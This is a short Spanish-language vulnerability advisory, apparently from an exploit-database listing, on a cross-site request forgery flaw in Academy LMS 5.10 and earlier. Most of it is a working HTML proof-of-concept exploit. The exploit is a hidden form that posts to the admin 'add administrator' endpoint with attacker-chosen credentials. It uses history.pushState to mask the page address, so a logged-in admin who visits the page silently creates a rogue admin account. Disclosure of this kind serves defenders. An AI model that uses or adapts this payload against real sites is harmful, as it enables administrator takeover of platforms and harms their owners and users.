
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS es una aplicación donde las personas pueden crear y promocionar cursos. La capacidad de añadir un nuevo usuario administrativo es vulnerable a CSRF, lo que hace posible utilizar ingeniería social para obtener acceso de administrador en la plataforma.
#Prueba de Concepto (POC) El primer paso en nuestra prueba de concepto es autenticarse en la plataforma con un usuario administrativo.
Después, simplemente acceda a la página que contiene el código para explotar la vulnerabilidad y observe que se ha añadido un nuevo usuario administrativo al sistema.
Código utilizado en el exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>